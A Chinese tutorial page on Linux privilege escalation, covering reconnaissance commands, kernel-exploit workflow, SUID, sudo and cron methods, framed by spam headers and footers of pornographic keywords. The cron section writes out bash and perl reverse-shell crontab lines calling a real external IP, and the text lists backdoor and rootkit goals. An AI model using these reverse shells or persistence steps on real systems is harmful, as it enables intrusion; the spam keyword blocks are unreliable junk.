gmnon.cn-疯狂蹂躏欧美一区二区精品,欧美精品久久久久a,高清在线视频日韩欧美,日韩免费av一区二区

站長資訊網
最全最豐富的資訊網站

linux提權是什么意思

提權指的是低權限用戶利用各種合法的或非法的手段獲取到了高于本用戶的系統權限;Linux提權一般是指獲取root用戶權限的操作過程。Linux提權的本質一方面是信息收集,另一方面是對內核漏洞的掌握情況;提權是否成功的關鍵是信息收集是否完整。

linux提權是什么意思

本教程操作環境:linux7.3系統、Dell G3電腦。

linux提權概念介紹

提權是什么

提權指的是低權限用戶利用各種合法的或非法的手段獲取到了高于本用戶的系統權限。

詳細來說,就是指利用操作系統或應用軟件中的程序漏洞、設計缺陷或配置疏忽來獲取對應用程序或用戶來說受保護資源的高級訪問權限。其結果是,應用程序可以獲取比應用程序開發者或系統管理員預期的更高的特權,從而可以執行授權的動作。

Linux提權一般是指獲取root用戶權限的操作過程。

Linux提權目的

提權操作有風險為什么還要進行提權?什么情況下需要進行提權?獲取高權限之后可以做什么?

通過命令執行漏洞獲取的一個反彈shell或是通過Web漏洞獲取了一個Webshell后,一般情況下權限都較低。在執行一些重要敏感的操作或是對重要的文件進行修改時無法正常進行,便需要進行提權。Linux中安裝的數據庫、中間件等一般都不是以root用戶啟動的,通過數據庫或是中間件獲取到的權限是是低權限的。

獲取一個root權限是每一個黑客的夢想。

  • 讀取寫入服務器中的重要文件:
    • 修改root密碼
    • 替換系統命令
  • 在系統中放置更為隱蔽的后門:
    • ping后門
    • Rootkit
  • 保證服務器重啟之后權限仍在:
    • 內存后門

Linux提權本質

Linux提權的本質一方面是信息收集,另一方面是對內核漏洞的掌握情況。

Linux信息收集

任何提權的第一步操作一定是對操作系統進行信息收集。提權是否成功的關鍵是信息收集是否完整。

  • 內核設備信息:

    • uname -a 打印所有可用的系統信息
    • uname -r 內核版本
    • uname -n 系統主機名。
    • uname -m 查看系統內核架構(64位/32位)
    • hostname 系統主機名
    • cat /proc/version 內核信息
    • cat /etc/*-release 分發信息
    • cat /etc/issue 分發信息
    • cat /proc/cpuinfo CPU信息
  • 用戶和群組信息:

    • cat /etc/passwd 列出系統上的所有用戶
    • cat /etc/group 列出系統上的所有組
    • grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超級用戶賬戶
    • whoami 查看當前用戶
    • w 誰目前已登錄,他們正在做什么
    • last 最后登錄用戶的列表
    • lastlog 所有用戶上次登錄的信息
    • lastlog -u %username% 有關指定用戶上次登錄的信息
    • lastlog |grep -v "Never" 以前登錄用戶的信息
  • 用戶和權限信息:

    • whoami 當前用戶名
    • id 當前用戶信息
    • cat /etc/sudoers 誰被允許以root身份執行
    • sudo -l 當前用戶可以以root身份執行操作
  • 環境系統變量信息:

    • env 顯示環境變量
    • set 現實環境變量
    • echo %PATH 路徑信息
    • history 顯示當前用戶的歷史命令記錄
    • pwd 輸出工作目錄
    • cat /etc/profile 顯示默認系統變量
    • cat /etc/shells 顯示可用的shell

內核漏洞提權

內核漏洞提權指的是普通用戶訪問操作系統內核,利用內核漏洞將權限提高為root權限,一般首先需要知曉操作系統的內核,內核的版本等信息,再尋找內核漏洞的EXP進行提權

linux常用查看系統信息命令  uname -a 查看系統全部信息 uname -r 查看內核版本 cat /proc/version 查看內核信息 cat /etc/*-realease 查看CentOS版本 cat /etc/issue 查看Ubuntu版本 cat /etc/redhat-release 查看RedHat版本 env 查看環境變量 echo $PATH 查看當前環境變量 awk -F: '($3==0){print $1}' /etc/passwd 查找UID為0的用戶 find / -user root -perm -4000 -exec ls -ldb {} ;  查找設置了SUID的文件
登錄后復制

例子:

1)查看系統的內核版本

linux提權是什么意思

2)使用kali的searchsploit尋找對應的內核漏洞或網上尋找相應的內核漏洞

linux提權是什么意思

3)使用gcc將C語言程序編譯成可執行文件,上傳至靶機,執行即可提權至root權限

Linux其他提權方法

1、計劃任務提權

利用原理:

  • 當 /bin/sh指向/bin/dash的時候(ubuntu默認這樣,當前的靶機也是這樣),反彈shell用bash的話得這樣彈: * * * * * root bash -c "bash -i >&/dev/tcp/106.13.124.93/2333 0>&1"
    這樣彈shell的時候不知道為什么很慢,耐心等等
  • */1 * * * * root perl -e 'use Socket;(i="106.13.124.93";)p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in((p,inet_aton()i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

2、利用SUID提權

  • SUID概念:SUID(設置用戶ID)是賦予文件的一種權限,它會出現在文件擁有者權限的執行位上,具有這種權限的文件會在其執行時,使調用者暫時獲得該文件擁有者的權限。SUID可以讓調用者以文件擁有者的身份運行該文件,所以我們利用SUID提權的思路就是運行root用戶所擁有的SUID的文件,那么我們運行該文件的時候就得獲得root用戶的身份了。那么,為什么要給Linux二進制文件設置這種權限呢?其實原因有很多,例如,程序ping需要root權限才能打開網絡套接字,但執行該程序的用戶通常都是由普通用戶,來驗證與其他主機的連通性。

  • SUID提權:什么是suid提權呢?一個文件,它有s標志,并且他輸入root,那么我們運行這個程序就可以有了root的權限,并且這個程序還得能執行命令,那么我們就能從普通用戶提升到了root權限了。

  • 在本地查找符合條件的文件。

    • find / -user root -perm -4000 -print 2>/dev/null
    • find / -perm -u=s -type f 2>/dev/null
    • find / -user root -perm -4000 -exec ls -ldb {} ;
  • 常見的可以提權的程序

    • nmap vim find Bash More Less Nano cp netcat

3、利用SUDO提權

Linux系統中可以使用sudo執行一個只有root才能執行的命令,配置文件保存在/etc/sudoers,sudo -l可以列出當前用戶支持sudo的命令。

盡量從代碼層面進行對漏洞的分析。

4、環境變量提權

  • 查看當前環境變量:

    • echo $PATH

5、root權限運行的服務

  • 以root的運行的服務,其中包括第三方軟件都可以進行提權。

贊(0)
分享到: 更多 (0)
網站地圖   滬ICP備18035694號-2    滬公網安備31011702889846號
gmnon.cn-疯狂蹂躏欧美一区二区精品,欧美精品久久久久a,高清在线视频日韩欧美,日韩免费av一区二区
九色porny91| 嫩草影院国产精品| 看全色黄大色大片| www.51色.com| 国产性生活一级片| 日韩av片免费观看| 久久婷婷中文字幕| 在线无限看免费粉色视频| 三上悠亚av一区二区三区| 国产福利在线免费| 中文字幕在线视频精品| 自拍一级黄色片| 蜜桃视频一区二区在线观看| 香港三级日本三级a视频| 污污污污污污www网站免费| www.xxx麻豆| 日批视频在线免费看| av无码精品一区二区三区| 手机看片福利盒子久久| 久久婷婷中文字幕| 特级黄色录像片| 日韩精品视频在线观看视频| 精品人妻一区二区三区四区在线| 成年人免费大片| 手机在线免费毛片| 777av视频| 精品久久久噜噜噜噜久久图片| 欧美极品少妇无套实战| 久久久久福利视频| 欧美成人免费高清视频| 韩国一区二区在线播放| 日本大片免费看| 国产高潮免费视频| 韩国黄色一级大片| 日韩欧美视频网站| 欧美一级免费在线| 无码人妻丰满熟妇区毛片| 在线视频日韩欧美| 亚洲色成人一区二区三区小说| 亚洲xxxx2d动漫1| 国内精品视频一区二区三区| 欧美男女交配视频| 岳毛多又紧做起爽| 亚洲精品国产suv一区88| 国产三级日本三级在线播放| 精品国偷自产一区二区三区| 中文字幕22页| 国产精品免费观看久久| 女女同性女同一区二区三区按摩| 97成人在线观看视频| 五月天综合婷婷| 中文字幕成人在线视频| 成人免费在线小视频| 久久这里只有精品8| 欧美在线a视频| 成人精品小视频| 免费看国产曰批40分钟| 91视频 - 88av| 99久久99精品| 中文字幕日韩综合| 久久国产精品国产精品| 欧美国产日韩在线播放| 女性女同性aⅴ免费观女性恋| 穿情趣内衣被c到高潮视频| 红桃视频 国产| 午夜免费福利网站| 91制片厂免费观看| 91香蕉视频免费看| 欧美日韩亚洲国产成人| 中文字幕第66页| 国产911在线观看| 伊人久久在线观看| 搞av.com| 97视频久久久| 欧美韩国日本在线| 日韩欧美黄色大片| 三级av免费观看| 在线观看免费不卡av| 香蕉视频999| 男人天堂成人网| 99久久国产综合精品五月天喷水| 天堂8在线天堂资源bt| 欧美精品久久久久久久自慰| r级无码视频在线观看| 久草热视频在线观看| 免费日韩中文字幕| 污色网站在线观看| 黄色网在线视频| caoporn超碰97| 婷婷视频在线播放| 国产午夜伦鲁鲁| 亚洲视频第二页| 老司机午夜免费福利视频| 福利视频一区二区三区四区| 手机看片福利盒子久久| 超碰免费在线公开| 国产一区二区三区精彩视频| 免费看涩涩视频| 国产精品国三级国产av| 日本熟妇人妻xxxxx| 欧美精品一区二区性色a+v| 日韩精品一区二区三区久久| 在线观看岛国av| 男人日女人逼逼| 国产91av视频在线观看| 人妻精品无码一区二区三区| 波多野结衣在线免费观看| 欧美国产激情视频| 男同互操gay射视频在线看| 久久精品网站视频| av免费看网址| 九九热视频免费| 欧美三级理论片| 欧美综合在线播放| 免费看黄色a级片| 91国内在线播放| av免费网站观看| 国产日产欧美视频| 天堂…中文在线最新版在线| 国产精品av免费| 五月婷婷之婷婷| 狠狠躁狠狠躁视频专区| 无码精品a∨在线观看中文| 91香蕉视频在线观看视频| 亚洲视频在线a| 国产视频在线视频| jizzjizz国产精品喷水| 国产91沈先生在线播放| 青青在线免费视频| 免费成人黄色大片| av噜噜在线观看| 亚洲欧美日韩三级| www.欧美激情.com| www.99r| 亚洲一区二区三区四区五区| 最近中文字幕一区二区| 天天干天天综合| www.这里只有精品| 中国黄色片一级| 欧美aaa在线观看| 香蕉精品视频在线| 99热这里只有精品免费| 特级西西444| 欧美黄色免费网址| 精品少妇人欧美激情在线观看| 国产 欧美 日本| 欧美 日韩精品| 亚洲天堂av线| 黄色免费高清视频| 97在线国产视频| 欧美三级一级片| 激情五月婷婷基地| 日本一级黄视频| 狠狠爱免费视频| 性chinese极品按摩| www激情五月| 全黄性性激高免费视频| 国产极品美女高潮无套久久久| 午夜久久久精品| 污污污污污污www网站免费| 无码人妻精品一区二区三区在线| 日韩精品一区中文字幕| 两性午夜免费视频| av之家在线观看| 九九久久久久久| 欧美三级午夜理伦三级| 波多野结衣激情| 欧美日韩第二页| 欧美久久久久久久久久久久久久| 欧美亚洲另类色图| 免费久久久久久| 91人人澡人人爽人人精品| 精品国产一区二区三区在线| 欧美 国产 日本| 波多野结衣av一区二区全免费观看| 日韩欧美国产免费| 欧美交换配乱吟粗大25p| 三级在线免费看| 青青青免费在线| 日韩欧美视频免费在线观看| av污在线观看| 欧美 国产 日本| 日本手机在线视频| 不卡中文字幕在线| 伊人国产在线视频| 日韩a在线播放| 久久精品免费一区二区| 成人短视频在线观看免费| www.久久久精品| 一级在线免费视频| av观看免费在线| 中文字幕无码精品亚洲35| 青青在线视频免费观看| 日本一级淫片演员| 青青草原国产免费| 日本成人xxx| 操bbb操bbb| 91看片淫黄大片91| 91国在线高清视频| mm131午夜|